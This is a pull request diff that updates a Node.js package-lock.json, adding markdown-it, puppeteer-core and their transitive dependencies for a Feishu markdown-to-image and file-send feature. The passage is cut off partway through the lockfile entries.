### PR TITLE
feat(feishu): markdown→PNG image render + outbound file send (Vincent 2026-06-29 hybrid)

### DIFF
--- a/agent-network/package-lock.json
+++ b/agent-network/package-lock.json
@@ -1,22 +1,25 @@
 {
   "name": "@sleep2agi/agent-network",
-  "version": "2.2.21",
+  "version": "2.3.0-preview.7",
   "lockfileVersion": 3,
   "requires": true,
   "packages": {
     "": {
       "name": "@sleep2agi/agent-network",
-      "version": "2.2.21",
+      "version": "2.3.0-preview.7",
       "license": "Apache-2.0",
       "dependencies": {
         "@inquirer/prompts": "^8.4.3",
-        "@larksuiteoapi/node-sdk": "^1.42.0"
+        "@larksuiteoapi/node-sdk": "^1.42.0",
+        "markdown-it": "^14.1.0",
+        "puppeteer-core": "^24.10.2"
       },
       "bin": {
         "anet": "dist/bin/cli.js"
       },
       "devDependencies": {
         "@modelcontextprotocol/sdk": "^1.12.0",
+        "@types/markdown-it": "^14.1.2",
         "@types/node": "^25.0.0",
         "javascript-obfuscator": "^5.4.1",
         "node-pty": "^1.1.0",
@@ -538,6 +541,58 @@
       "integrity": "sha512-oOAWABowe8EAbMyWKM0tYDKi8Yaox52D+HWZhAIJqQXbqe0xI/GV7FhLWqlEKreMkfDjshR5FKgi3mnle0h6Eg==",
       "license": "BSD-3-Clause"
     },
+    "node_modules/@puppeteer/browsers": {
+      "version": "2.13.2",
+      "resolved": "https://registry.npmjs.org/@puppeteer/browsers/-/browsers-2.13.2.tgz",
+      "integrity": "sha512-5EUZSUIc37H6aIXyWO0Z4y8NlF8NnjgmqeQgOGiswAU7pY0HOo16ho4+alIWmSfdZnjqBRawMsP3I5YqLSn6kw==",
+      "license": "Apache-2.0",
+      "dependencies": {
+        "debug": "^4.4.3",
+        "extract-zip": "^2.0.1",
+        "progress": "^2.0.3",
+        "proxy-agent": "^6.5.0",
+        "semver": "^7.7.4",
+        "tar-fs": "^3.1.1",
+        "yargs": "^17.7.2"
+      },
+      "bin": {
+        "browsers": "lib/cjs/main-cli.js"
+      },
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@tootallnate/quickjs-emscripten": {
+      "version": "0.23.0",
+      "resolved": "https://registry.npmjs.org/@tootallnate/quickjs-emscripten/-/quickjs-emscripten-0.23.0.tgz",
+      "integrity": "sha512-C5Mc6rdnsaJDjO3UpGW/CQTHtCKaYlScZTly4JIu97Jxo/odCiH0ITnDXSJPTOrEKk/ycSZ0AOgTmkDtkOsvIA==",
+      "license": "MIT"
+    },
+    "node_modules/@types/linkify-it": {
+      "version": "5.0.0",
+      "resolved": "https://registry.npmjs.org/@types/linkify-it/-/linkify-it-5.0.0.tgz",
+      "integrity": "sha512-sVDA58zAw4eWAffKOaQH5/5j3XeayukzDk+ewSsnv3p4yJEZHCCzMDiZM8e0OUrRvmpGZ85jf4yDHkHsgBNr9Q==",
+      "dev": true,
+      "license": "MIT"
+    },
+    "node_modules/@types/markdown-it": {
+      "version": "14.1.2",
+      "resolved": "https://registry.npmjs.org/@types/markdown-it/-/markdown-it-14.1.2.tgz",
+      "integrity": "sha512-promo4eFwuiW+TfGxhi+0x3czqTYJkG8qB17ZUJiVF10Xm7NLVRSLUsfRTU/6h1e24VvRnXCx+hG7li58lkzog==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@types/linkify-it": "^5",
+        "@types/mdurl": "^2"
+      }
+    },
+    "node_modules/@types/mdurl": {
+      "version": "2.0.0",
+      "resolved": "https://registry.npmjs.org/@types/mdurl/-/mdurl-2.0.0.tgz",
+      "integrity": "sha512-RGdgjQUZba5p6QEFAVx2OGb8rQDL/cPRG7GiedRzMcJ1tYnUANBncjbSB1NRGwbvjcPeikRABz2nshyPk1bhWg==",
+      "dev": true,
+      "license": "MIT"
+    },
     "node_modules/@types/minimatch": {
       "version": "3.0.5",
       "resolved": "https://registry.npmjs.org/@types/minimatch/-/minimatch-3.0.5.tgz",
@@ -558,6 +613,16 @@
       "integrity": "sha512-T8L6i7wCuyoK8A/ZeLYt1+q0ty3Zb9+qbSSvrIVitzT3YjZqkTZ40IbRsPanlB4h1QB3JVL1SYCdR6ngtFYcuA==",
       "dev": true,
       "license": "MIT"
+    },
+    "node_modules/@types/yauzl": {
+      "version": "2.10.3",
+      "resolved": "https://registry.npmjs.org/@types/yauzl/-/yauzl-2.10.3.tgz",
+      "integrity": "sha512-oJoftv0LSuaDZE3Le4DbKX+KS9G36NzOeSap90UIK0yMA/NhKJhqlSGtNDORNRaIbQfzjXDrQa0ytJ6mNRGz/Q==",
+      "license": "MIT",
+      "optional": true,
+      "dependencies": {
+        "@types/node": "*"
+      }
     },
     "node_modules/@vercel/blob": {
       "version": "2.3.3",
@@ -613,6 +678,15 @@
         "acorn": "^8"
       }
     },
+    "node_modules/agent-base": {
+      "version": "7.1.4",
+      "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.4.tgz",
+      "integrity": "sha512-MnA+YT8fwfJPgBx3m60MNqakm30XOkyIoH1y6huTQvC0PwZG7ki8NacLBcrPbNoo8vEZy7Jpuk7+jMO+CUovTQ==",
+      "license": "MIT",
+      "engines": {
+        "node": ">= 14"
+      }
+    },
     "node_modules/ajv": {
       "version": "8.20.0",
       "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.20.0.tgz",
@@ -648,9 +722,17 @@
         }
       }
     },
+    "node_modules/ansi-regex": {
+      "version": "5.0.1",
+      "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz",
+      "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==",
+      "license": "MIT",
+      "engines": {
+        "node": ">=8"
+      }
+    },
     "node_modules/ansi-styles": {
       "version": "4.3.0",
-      "dev": true,
       "license": "MIT",
       "dependencies": {
         "color-convert": "^2.0.1"
@@ -661,6 +743,12 @@
       "funding": {
         "url": "https://github.com/chalk/ansi-styles?sponsor=1"
       }
+    },
+    "node_modules/argparse": {
+      "version": "2.0.1",
+      "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz",
+      "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==",
+      "license": "Python-2.0"
     },
     "node_modules/array-differ": {
       "version": "3.0.0",
@@ -706,6 +794,18 @@
         "util": "^0.12.5"
       }
     },
+    "node_modules/ast-types": {
+      "version": "0.13.4",
+      "resolved": "https://registry.npmjs.org/ast-types/-/ast-types-0.13.4.tgz",
+      "integrity": "sha512-x1FCFnFifvYDDzTaLII71vG5uvDwgtmDTEVWAxrgeiR8VjMONcCXJx7E+USjDtHlwFmt9MysbqgF9b9Vjr6w+w==",
+      "license": "MIT",
+      "dependencies": {
+        "tslib": "^2.0.1"
+      },
+      "engines": {
+        "node": ">=4"
+      }
+    },
     "node_modules/async-retry": {
       "version": "1.3.3",
       "resolved": "https://registry.npmjs.org/async-retry/-/async-retry-1.3.3.tgz",
@@ -749,12 +849,127 @@
         "proxy-from-env": "^1.1.0"
       }
     },
+    "node_modules/b4a": {
+      "version": "1.8.1",
+      "resolved": "https://registry.npmjs.org/b4a/-/b4a-1.8.1.tgz",
+      "integrity": "sha512-aiqre1Nr0B/6DgE2N5vwTc+2/oQZ4Wh1t4NznYY4E00y8LCt6NqdRv81so00oo27D8MVKTpUa/MwUUtBLXCoDw==",
+      "license": "Apache-2.0",
+      "peerDependencies": {
+        "react-native-b4a": "*"
+      },
+      "peerDependenciesMeta": {
+        "react-native-b4a": {
+          "optional": true
+        }
+      }
+    },
     "node_modules/balanced-match": {
       "version": "1.0.2",
       "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz",
       "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==",
       "dev": true,
       "license": "MIT"
+    },
+    "node_modules/bare-events": {
+      "version": "2.9.1",
+      "resolved": "https://registry.npmjs.org/bare-events/-/bare-events-2.9.1.tgz",
+      "integrity": "sha512-Z0oHEHAFDZkffN8Qc39zNZjQlMDkPJRyyyZieU1VH7u8c5S+qHZ2S8ixdKIAxEjfHO7FJxXmJWgteOghVanIsg==",
+      "license": "Apache-2.0",
+      "peerDependencies": {
+        "bare-abort-controller": "*"
+      },
+      "peerDependenciesMeta": {
+        "bare-abort-controller": {
+          "optional": true
+        }
+      }
+    },
+    "node_modules/bare-fs": {
+      "version": "4.7.2",
+      "resolved": "https://registry.npmjs.org/bare-fs/-/bare-fs-4.7.2.tgz",
+      "integrity": "sha512-aTvMFUWkBmjzKtEQMDGGDNF8bkfpD5N1b/FCwt7A3wrU4t1o/e/85Wzkluh6JlODCjqVESYCkQCdTXqZ9G7VFg==",
+      "license": "Apache-2.0",
+      "dependencies": {
+        "bare-events": "^2.5.4",
+        "bare-path": "^3.0.0",
+        "bare-stream": "^2.6.4",
+        "bare-url": "^2.2.2",
+        "fast-fifo": "^1.3.2"
+      },
+      "engines": {
+        "bare": ">=1.16.0"
+      },
+      "peerDependencies": {
+        "bare-buffer": "*"
+      },
+      "peerDependenciesMeta": {
+        "bare-buffer": {
+          "optional": true
+        }
+      }
+    },
+    "node_modules/bare-os": {
+      "version": "3.9.3",
+      "resolved": "https://registry.npmjs.org/bare-os/-/bare-os-3.9.3.tgz",
+      "integrity": "sha512-fF4Q7QsyKVF5Rj0qvI8BgUNjqzC2JvQlpTaPLjVJVxYVUX5Zr9un+y3w1HmA4nNKdFmRBT8z/WmrjvXzXVerKQ==",
+      "license": "Apache-2.0",
+      "engines": {
+        "bare": ">=1.14.0"
+      }
+    },
+    "node_modules/bare-path": {
+      "version": "3.0.1",
+      "resolved": "https://registry.npmjs.org/bare-path/-/bare-path-3.0.1.tgz",
+      "integrity": "sha512-ghj2DSK/2e99a1anTVPCV4m4YIYtrbXhfM7V3D7XZLOTsybnYyaJloymGqssQc8l/or0UoDyRtNQkmkEF/ysgQ==",
+      "license": "Apache-2.0",
+      "dependencies": {
+        "bare-os": "^3.0.1"
+      }
+    },
+    "node_modules/bare-stream": {
+      "version": "2.13.3",
+      "resolved": "https://registry.npmjs.org/bare-stream/-/bare-stream-2.13.3.tgz",
+      "integrity": "sha512-Kc+brLqvEqGkjyfiwJmImAOqLZL7OsoLKuavx+hJjgVV3nLTOjloJyPMFxjUPerGGHrNH0fLU06jjykMLWrERQ==",
+      "license": "Apache-2.0",
+      "dependencies": {
+        "b4a": "^1.8.1",
+        "streamx": "^2.25.0",
+        "teex": "^1.0.1"
+      },
+      "peerDependencies": {
+        "bare-abort-controller": "*",
+        "bare-buffer": "*",
+        "bare-events": "*"
+      },
+      "peerDependenciesMeta": {
+        "bare-abort-controller": {
+          "optional": true
+        },
+        "bare-buffer": {
+          "optional": true
+        },
+        "bare-events": {
+          "optional": true
+        }
+      }
+    },
+    "node_modules/bare-url": {
+      "version": "2.4.5",
+      "resolved": "https://registry.npmjs.org/bare-url/-/bare-url-2.4.5.tgz",
+      "integrity": "sha512-K+y9xF1tN+CdPu4qWwr0QiK1Al07eFPGYK5M2pDXcmHdMdgC/tT/bpmMe1hrmRHaidKLkXrC+cRNYf3XVDUhSQ==",
+      "license": "Apache-2.0",
+      "dependencies": {
+        "bare-path": "^3.0.0"
+      }
+    },
+    "node_modules/basic-ftp": {
+      "version": "5.3.1",
+      "resolved": "https://registry.npmjs.org/basic-ftp/-/basic-ftp-5.3.1.tgz",
+      "integrity": "sha512-bopVNp6ugyA150DDuZfPFdt1KZ5a94ZDiwX4hMgZDzF+GttD80lEy8kj98kbyhLXnPvhtIo93mdnLIjpCAeeOw==",
+      "license": "MIT",
+      "engines": {
+        "node": ">=10.0.0"
+      }
     },
     "node_modules/body-parser": {
       "version": "2.2.2",
@@ -790,6 +1005,15 @@
       "dependencies": {
         "balanced-match": "^1.0.0",
         "concat-map": "0.0.1"
+      }
+    },
+    "node_modules/buffer-crc32": {
+      "version": "0.2.13",
+      "resolved": "https://registry.npmjs.org/buffer-crc32/-/buffer-crc32-0.2.13.tgz",
+      "integrity": "sha512-VO9Ht/+p3SN7SKWqcrgEzjGbRSJYTx+Q1pTQC0wrWqHx0vpJraQ6GtHx8tvcg1rlK1byhU5gccxgOgj7B0TDkQ==",
+      "license": "MIT",
+      "engines": {
+        "node": "*"
       }
     },
     "node_modules/bytes": {
@@ -900,6 +1124,28 @@
         "node": "*"
       }
     },
+    "node_modules/chromium-bidi": {
+      "version": "14.0.0",
+      "resolved": "https://registry.npmjs.org/chromium-bidi/-/chromium-bidi-14.0.0.tgz",
+      "integrity": "sha512-9gYlLtS6tStdRWzrtXaTMnqcM4dudNegMXJxkR0I/CXObHalYeYcAMPrL19eroNZHtJ8DQmu1E+ZNOYu/IXMXw==",
+      "license": "Apache-2.0",
+      "dependencies": {
+        "mitt": "^3.0.1",
+        "zod": "^3.24.1"
+      },
+      "peerDependencies": {
+        "devtools-protocol": "*"
+      }
+    },
+    "node_modules/chromium-bidi/node_modules/zod": {
+      "version": "3.25.76",
+      "resolved": "https://registry.npmjs.org/zod/-/zod-3.25.76.tgz",
+      "integrity": "sha512-gzUt/qt81nXsFGKIFcC3YnfEAx5NkunCfnDlvuBSSFS02bcXu4Lmea0AFIUwbLWxWPx3d9p8S5QoaujKcNQxcQ==",
+      "license": "MIT",
+      "funding": {
+        "url": "https://github.com/sponsors/colinhacks"
+      }
+    },
     "node_modules/class-validator": {
       "version": "0.14.3",
       "resolved": "https://registry.npmjs.org/class-validator/-/class-validator-0.14.3.tgz",
@@ -921,9 +1167,22 @@
         "node": ">= 12"
       }
     },
+    "node_modules/cliui": {
+      "version": "8.0.1",
+      "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz",
+      "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==",
+      "license": "ISC",
+      "dependencies": {
+        "string-width": "^4.2.0",
+        "strip-ansi": "^6.0.1",
+        "wrap-ansi": "^7.0.0"
+      },
+      "engines": {
+        "node": ">=12"
+      }
+    },
     "node_modules/color-convert": {
       "version": "2.0.1",
-      "dev": true,
       "license": "MIT",
       "dependencies": {
         "color-name": "~1.1.4"
@@ -934,7 +1193,6 @@
     },
     "node_modules/color-name": {
       "version": "1.1.4",
-      "dev": true,
       "license": "MIT"
     },
     "node_modules/combined-stream": {
@@ -1053,11 +1311,19 @@
         "node": "*"
       }
     },
+    "node_modules/data-uri-to-buffer": {
+      "version": "6.0.2",
+      "resolved": "https://registry.npmjs.org/data-uri-to-buffer/-/data-uri-to-buffer-6.0.2.tgz",
+      "integrity": "sha512-7hvf7/GW8e86rW0ptuwS3OcBGDjIi6SZva7hCyWC0yYry2cOPmLIjXAUHI6DK2HsnwJd9ifmt57i8eV2n4YNpw==",
+      "license": "MIT",
+      "engines": {
+        "node": ">= 14"
+      }
+    },
     "node_modules/debug": {
       "version": "4.4.3",
       "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.3.tgz",
       "integrity": "sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA==",
-      "dev": true,
       "license": "MIT",
       "dependencies": {
         "ms": "^2.1.3"
@@ -1114,6 +1380,20 @@
         "url": "https://github.com/sponsors/ljharb"
       }
     },
+    "node_modules/degenerator": {
+      "version": "5.0.1",
+      "resolved": "https://registry.npmjs.org/degenerator/-/degenerator-5.0.1.tgz",
+      "integrity": "sha512-TllpMR/t0M5sqCXfj85i4XaAzxmS5tVA16dqvdkMwGmzI+dXLXnw3J+3Vdv7VKw+ThlTMboK6i9rnZ6Nntj5CQ==",
+      "license": "MIT",
+      "dependencies": {
+        "ast-types": "^0.13.4",
+        "escodegen": "^2.1.0",
+        "esprima": "^4.0.1"
+      },
+      "engines": {
+        "node": ">= 14"
+      }
+    },
     "node_modules/delayed-stream": {
       "version": "1.0.0",
       "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz",
@@ -1132,6 +1412,12 @@
       "engines": {
         "node": ">= 0.8"
       }
+    },
+    "node_modules/devtools-protocol": {
+      "version": "0.0.1608973",
+      "resolved": "https://registry.npmjs.org/devtools-protocol/-/devtools-protocol-0.0.1608973.tgz",
+      "integrity": "sha512-Tpm17fxYzt+J7VrGdc1k8YdRqS3YV7se/M6KeemEqvUbq/n7At1rWVuXMxQgpWkdwSdIEKYbU//Bve+Shm4YNQ==",
+      "license": "BSD-3-Clause"
     },
     "node_modules/dunder-proto": {
       "version": "1.0.1",
@@ -1154,6 +1440,12 @@
       "dev": true,
       "license": "MIT"
     },
+    "node_modules/emoji-regex": {
+      "version": "8.0.0",
+      "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz",
+      "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==",
+      "license": "MIT"
+    },
     "node_modules/encodeurl": {
       "version": "2.0.0",
       "resolved": "https://registry.npmjs.org/encodeurl/-/encodeurl-2.0.0.tgz",
@@ -1162,6 +1454,27 @@
       "license": "MIT",
       "engines": {
         "node": ">= 0.8"
+      }
+    },
+    "node_modules/end-of-stream": {
+      "version": "1.4.5",
+      "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.5.tgz",
+      "integrity": "sha512-ooEGc6HP26xXq/N+GCGOT0JKCLDGrq2bQUZrQ7gyrJiZANJ/8YDTxTpQBXGMn+WbIQXNVpyWymm7KYVICQnyOg==",
+      "license": "MIT",
+      "dependencies": {
+        "once": "^1.4.0"
+      }
+    },
+    "node_modules/entities": {
+      "version": "4.5.0",
+      "resolved": "https://registry.npmjs.org/entities/-/entities-4.5.0.tgz",
+      "integrity": "sha512-V0hjH4dGPh9Ao5p0MoRY6BVqtwCjhz6vI5LT8AJ55H+4g9/4vbHx1I54fS0XuclLhDHArPQCiMjDxjaL8fPxhw==",
+      "license": "BSD-2-Clause",
+      "engines": {
+        "node": ">=0.12"
+      },
+      "funding": {
+        "url": "https://github.com/fb55/entities?sponsor=1"
       }
     },
     "node_modules/env-paths": {
@@ -1225,12 +1538,42 @@
         "node": ">= 0.4"
       }
     },
+    "node_modules/escalade": {
+      "version": "3.2.0",
+      "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.2.0.tgz",
+      "integrity": "sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==",
+      "license": "MIT",
+      "engines": {
+        "node": ">=6"
+      }
+    },
     "node_modules/escape-html": {
       "version": "1.0.3",
       "resolved": "https://registry.npmjs.org/escape-html/-/escape-html-1.0.3.tgz",
       "integrity": "sha512-NiSupZ4OeuGwr68lGIeym/ksIZMJodUGOSCZ/FSnTxcrekbvqrgdUxlJOMpijaKZVjAJrWrGs/6Jy8OMuyj9ow==",
       "dev": true,
       "license": "MIT"
+    },
+    "node_modules/escodegen": {
+      "version": "2.1.0",
+      "resolved": "https://registry.npmjs.org/escodegen/-/escodegen-2.1.0.tgz",
+      "integrity": "sha512-2NlIDTwUWJN0mRPQOdtQBzbUHvdGY2P1VXSyU83Q3xKxM7WHX2Ql8dKq782Q9TgQUNOLEzEYu9bzLNj1q88I5w==",
+      "license": "BSD-2-Clause",
+      "dependencies": {
+        "esprima": "^4.0.1",
+        "estraverse": "^5.2.0",
+        "esutils": "^2.0.2"
+      },
+      "bin": {
+        "escodegen": "bin/escodegen.js",
+        "esgenerate": "bin/esgenerate.js"
+      },
+      "engines": {
+        "node": ">=6.0"
+      },
+      "optionalDependencies": {
+        "source-map": "~0.6.1"
+      }
     },
     "node_modules/eslint-scope": {
       "version": "8.4.0",
@@ -1266,7 +1609,6 @@
       "version": "4.0.1",
       "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz",
       "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==",
-      "dev": true,
       "license": "BSD-2-Clause",
       "bin": {
         "esparse": "bin/esparse.js",
@@ -1293,7 +1635,6 @@
       "version": "5.3.0",
       "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-5.3.0.tgz",
       "integrity": "sha512-MMdARuVEQziNTeJD8DgMqmhwR11BRQ/cBP+pLtYdSTnf3MIO8fFeiINEbX36ZdNlfU/7A9f3gUw49B3oQsvwBA==",
-      "dev": true,
       "license": "BSD-2-Clause",
       "engines": {
         "node": ">=4.0"
@@ -1303,7 +1644,6 @@
       "version": "2.0.3",
       "resolved": "https://registry.npmjs.org/esutils/-/esutils-2.0.3.tgz",
       "integrity": "sha512-kVscqXk4OCp68SZ0dkgEKVi6/8ij300KBWTJq32P/dYeWTSwK41WyTxalN1eRmA5Z9UU/LX9D7FWSmV9SAYx6g==",
-      "dev": true,
       "license": "BSD-2-Clause",
       "engines": {
         "node": ">=0.10.0"
@@ -1317,6 +1657,15 @@
       "license": "MIT",
       "engines": {
         "node": ">= 0.6"
+      }
+    },
+    "node_modules/events-universal": {
+      "version": "1.0.1",
+      "resolved": "https://registry.npmjs.org/events-universal/-/events-universal-1.0.1.tgz",
+      "integrity": "sha512-LUd5euvbMLpwOF8m6ivPCbhQeSiYVNb8Vs0fQ8QjXo0JTkEHpz8pxdQf0gStltaPpw0Cca8b39KxvK9cfKRiAw==",
+      "license": "Apache-2.0",
+      "dependencies": {
+        "bare-events": "^2.7.0"
       }
     },
     "node_modules/eventsource": {
@@ -1405,11 +1754,37 @@
         "express": ">= 4.11"
       }
     },
+    "node_modules/extract-zip": {
+      "version": "2.0.1",
+      "resolved": "https://registry.npmjs.org/extract-zip/-/extract-zip-2.0.1.tgz",
+      "integrity": "sha512-GDhU9ntwuKyGXdZBUgTIe+vXnWj0fppUEtMDL0+idd5Sta8TGpHssn/eusA9mrPr9qNDym6SxAYZjNvCn/9RBg==",
+      "license": "BSD-2-Clause",
+      "dependencies": {
+        "debug": "^4.1.1",
+        "get-stream": "^5.1.0",
+        "yauzl": "^2.10.0"
+      },
+      "bin": {
+        "extract-zip": "cli.js"
+      },
+      "engines": {
+        "node": ">= 10.17.0"
+      },
+      "optionalDependencies": {
+        "@types/yauzl": "^2.9.1"
+      }
+    },
     "node_modules/fast-deep-equal": {
       "version": "3.1.3",
       "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz",
       "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==",
       "dev": true,
+      "license": "MIT"
+    },
+    "node_modules/fast-fifo": {
+      "version": "1.3.2",
+      "resolved": "https://registry.npmjs.org/fast-fifo/-/fast-fifo-1.3.2.tgz",
+      "integrity": "sha512-/d9sfos4yxzpwkDkuN7k2SqFKtYNmCTzgfEpz82x34IM9/zc8KGxQoXg1liNC/izpRM/MBdt44Nmx41ZWqk+FQ==",
       "license": "MIT"
     },
     "node_modules/fast-levenshtein": {
@@ -1458,6 +1833,15 @@
       "license": "MIT",
       "dependencies": {
         "fast-string-width": "^3.0.2"
+      }
+    },
+    "node_modules/fd-slicer": {
+      "version": "1.1.0",
+      "resolved": "https://registry.npmjs.org/fd-slicer/-/fd-slicer-1.1.0.tgz",
+      "integrity": "sha512-cE1qsB/VwyQozZ+q1dGxR8LBYNZeofhEdUNGSMbQD3Gw2lAzX9Zb3uIU6Ebc/Fmyjo9AWWfnn0AUCHqtevs/8g==",
+      "license": "MIT",
+      "dependencies": {
+        "pend": "~1.2.0"
       }
     },
     "node_modules/finalhandler": {
@@ -1606,6 +1990,15 @@
         "node": ">= 0.4"
       }
     },
+    "node_modules/get-caller-file": {
+      "version": "2.0.5",
+      "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz",
+      "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==",
+      "license": "ISC",
+      "engines": {
+        "node": "6.* || 8.* || >= 10.*"
+      }
+    },
     "node_modules/get-intrinsic": {
       "version": "1.3.0",
       "resolved": "https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz",
@@ -1641,6 +2034,35 @@
       },
       "engines": {
         "node": ">= 0.4"
+      }
+    },
+    "node_modules/get-stream": {
+      "version": "5.2.0",
+      "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-5.2.0.tgz",
+      "integrity": "sha512-nBF+F1rAZVCu/p7rjzgA+Yb4lfYXrpl7a6VmJrU8wF9I1CKvP/QwPNZHnOlwbTkY6dvtFIzFMSyQXbLoTQPRpA==",
+      "license": "MIT",
+      "dependencies": {
+        "pump": "^3.0.0"
+      },
+      "engines": {
+        "node": ">=8"
+      },
+      "funding": {
+        "url": "https://github.com/sponsors/sindresorhus"
+      }
+    },
+    "node_modules/get-uri": {
+      "version": "6.0.5",
+      "resolved": "https://registry.npmjs.org/get-uri/-/get-uri-6.0.5.tgz",
+      "integrity": "sha512-b1O07XYq8eRuVzBNgJLstU6FYc1tS6wnMtF1I1D9lE8LxZSOGZ7LhxN54yPP6mGw5f2CkXY2BQUL9Fx41qvcIg==",
+      "license": "MIT",
+      "dependencies": {
+        "basic-ftp": "^5.0.2",
+        "data-uri-to-buffer": "^6.0.2",
+        "debug": "^4.3.4"
+      },
+      "engines": {
+        "node": ">= 14"
       }
     },
     "node_modules/gopd": {
@@ -1748,6 +2170,32 @@
         "url": "https://opencollective.com/express"
       }
     },
+    "node_modules/http-proxy-agent": {
+      "version": "7.0.2",
+      "resolved": "https://registry.npmjs.org/http-proxy-agent/-/http-proxy-agent-7.0.2.tgz",
+      "integrity": "sha512-T1gkAiYYDWYx3V5Bmyu7HcfcvL7mUrTWiM6yOfa3PIphViJ/gFPbvidQ+veqSOHci/PxBcDabeUNCzpOODJZig==",
+      "license": "MIT",
+      "dependencies": {
+        "agent-base": "^7.1.0",
+        "debug": "^4.3.4"
+      },
+      "engines": {
+        "node": ">= 14"
+      }
+    },
+    "node_modules/https-proxy-agent": {
+      "version": "7.0.6",
+      "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-7.0.6.tgz",
+      "integrity": "sha512-vK9P5/iUfdl95AI+JVyUuIcVtd4ofvtrOr3HNtM2yxC9bnMbEdp3x01OhQNnjb8IJYi38VlTE3mBXwcfvywuSw==",
+      "license": "MIT",
+      "dependencies": {
+        "agent-base": "^7.1.2",
+        "debug": "4"
+      },
+      "engines": {
+        "node": ">= 14"
+      }
+    },
     "node_modules/iconv-lite": {
       "version": "0.7.2",
       "license": "MIT",
@@ -1784,7 +2232,6 @@
       "version": "10.2.0",
       "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-10.2.0.tgz",
       "integrity": "sha512-/+S6j4E9AHvW9SWMSEY9Xfy66O5PWvVEJ08O0y5JGyEKQpojb0K0GKpz/v5HJ/G0vi3D2sjGK78119oXZeE0qA==",
-      "dev": true,
       "license": "MIT",
       "engines": {
         "node": ">= 12"
@@ -1852,6 +2299,15 @@
       },
       "funding": {
         "url": "https://github.com/sponsors/ljharb"
+      }
+    },
+    "node_modules/is-fullwidth-code-point": {
+      "version": "3.0.0",
+      "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz",
+      "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==",
+      "license": "MIT",
+      "engines": {
+        "node": ">=8"
       }
     },
     "node_modules/is-generator-function": {
@@ -2053,6 +2509,25 @@
       "dev": true,
       "license": "MIT"
     },
+    "node_modules/linkify-it": {
+      "version": "5.0.1",
+      "resolved": "https://registry.npmjs.org/linkify-it/-/linkify-it-5.0.1.tgz",
+      "integrity": "sha512-wVoTjP4Q6R0NW5hiZkVJaFZPWgtXfoGF+6LucL3/FtiNjmcHhYjEr5f1Kqjirc1nBW07J/ZuRFumqr2oqccEWg==",
+      "funding": [
+        {
+          "type": "github",
+          "url": "https://github.com/sponsors/puzrin"
+        },
+        {
+          "type": "github",
+          "url": "https://github.com/sponsors/markdown-it"
+        }
+      ],
+      "license": "MIT",
+      "dependencies": {
+        "uc.micro": "^2.0.0"
+      }
+    },
     "node_modules/lodash.identity": {
       "version": "3.0.0",
       "resolved": "https://registry.npmjs.org/lodash.identity/-/lodash.identity-3.0.0.tgz",
@@ -2076,6 +2551,42 @@
       "resolved": "https://registry.npmjs.org/long/-/long-5.3.2.tgz",
       "integrity": "sha512-mNAgZ1GmyNhD7AuqnTG3/VQ26o760+ZYBPKjPvugO8+nLbYfX6TVpJPseBvopbdY+qpZ/lKUnmEc1LeZYS3QAA==",
       "license": "Apache-2.0"
+    },
+    "node_modules/lru-cache": {
+      "version": "7.18.3",
+      "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-7.18.3.tgz",
+      "integrity": "sha512-jumlc0BIUrS3qJGgIkWZsyfAM7NCWiBcCDhnd+3NNM5KbBmLTgHVfWBcg6W+rLUsIpzpERPsvwUP7CckAQSOoA==",
